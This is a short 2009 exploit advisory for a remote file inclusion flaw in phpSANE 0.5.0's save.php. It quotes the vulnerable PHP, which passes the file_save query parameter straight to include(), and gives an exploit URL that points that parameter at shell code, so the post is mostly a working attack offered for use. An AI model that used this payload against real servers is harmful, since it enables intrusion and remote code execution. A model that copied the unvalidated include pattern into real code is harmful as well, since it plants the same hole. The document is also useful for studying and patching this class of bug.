phpsane-rfi.txt

Posted on 27 August 2009
-----------------------------------------------------------------------------------
phpSANE v 0.5.0 (save.php) Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------
Author: CoBRa_21
Mail: uyku_cu@windowslive.com
Script Download:http://sourceforge.net/projects/phpsane/
Dork: Yok :P
-----------------------------------------------------------------------------------
BUG
<?PHP
include("language.php");

$file_save = $_GET['file_save'];
$file_save_image = $_GET['file_save_image'];
$lang_id = $_GET['lang_id'];

if ($file_save_image)
{
echo "<p class="align_center">
";
echo "<img src="".$file_save."" border="2">
";
echo "</p>
";
}
else
{
// my_pre my_mono
echo "<p class="my_pre">
";
include($file_save);
echo "</p>
";
echo "<hr>
";
}
-----------------------------------------------------------------------------------
Exploit
http://localhost/path/save.php?file_save= (Shell Code)
-----------------------------------------------------------------------------------
TÃ¼m Ä°slam Aleminin Ramazan-Ä± Åžerifleri HayÄ±rlÄ± ve Mubarek Olsun.
-----------------------------------------------------------------------------------
TOP
Malware :

None in database
Last 20
Exploits :

Last 20